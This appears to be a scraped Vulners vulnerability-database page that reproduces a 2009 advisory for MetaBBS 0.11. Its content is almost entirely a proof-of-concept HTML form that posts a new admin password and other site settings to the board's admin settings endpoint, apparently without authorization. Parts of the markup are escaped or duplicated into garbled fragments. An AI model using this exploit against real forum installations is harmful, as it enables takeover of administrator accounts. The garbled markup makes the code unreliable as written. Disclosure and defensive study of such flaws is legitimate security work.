<label for="settings_admin_password">Admin password</label>
<input id="settings_admin_password" size="20" name="s...">metabbs 0.11 Change admin password vulnerability - vulnerability database | Vulners.com
<label for="settings_admin_password">Admin password</label>
<input id="settings_admin_password" size="20" name="s...">
<label for="settings_admin_password">Admin password</label>
<input id="settings_admin_password" size="20" name="s...">
<label for="settings_admin_password">Admin password</label>
<input id="settings_admin_password" size="20" name="s...">
Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21294
HistoryFeb 05, 2009 - 12:00 a.m.

metabbs 0.11 Change admin password vulnerability

2009-02-0500:00:00
vulners.com
34
JSON

Metabbs 0.11
2008-08-06 19:56

<form method="post" action="http://test.com/metabbs/admin/settings/?&quot;&gt;
<dl>
<dt><label for="settings_admin_password">Admin password</label></dt>
<dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd>

    &lt;dt&gt;&lt;label for=&quot;settings_global_header&quot;&gt;Header file&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;input id=&quot;settings_global_header&quot; size=&quot;30&quot; name=&quot;settings[global_header]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_global_footer&quot;&gt;Footer File&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;input id=&quot;settings_global_footer&quot; size=&quot;30&quot; name=&quot;settings[global_footer]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_theme&quot;&gt;Site theme&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;input id=&quot;settings_theme&quot; size=&quot;30&quot; name=&quot;settings[theme]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_default_language&quot;&gt;Language&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;
            &lt;dd&gt;&lt;input id=&quot;ettings_default_language&quot; size=&quot;30&quot; name=&quot;settings[default_language]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;
            &lt;input name=&quot;settings[always_use_default_language]&quot; value=&quot;0&quot; type=&quot;hidden&quot; /&gt;&lt;input id=&quot;settings_always_use_default_language&quot; name=&quot;settings[always_use_default_language]&quot; value=&quot;1&quot; type=&quot;checkbox&quot; /&gt;                
    &lt;label for=&quot;settings_always_use_default_language&quot;&gt;Always Use Default Language&lt;/label&gt;   &lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_timezone&quot;&gt;TimeZone&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;
            &lt;dd&gt;&lt;input id=&quot;settings_timezone&quot; size=&quot;30&quot; name=&quot;settings[timezone]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

</dl>

<h2>Advanced Setting</h2>
<p><input name="settings[force_fancy_url]" value="0" type="hidden" />
<input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" />
<label for="settings_force_fancy_url">Fancy URL Force Apply</label></p>

<p><input type="submit" value="OK" /></p>
</form>

JSON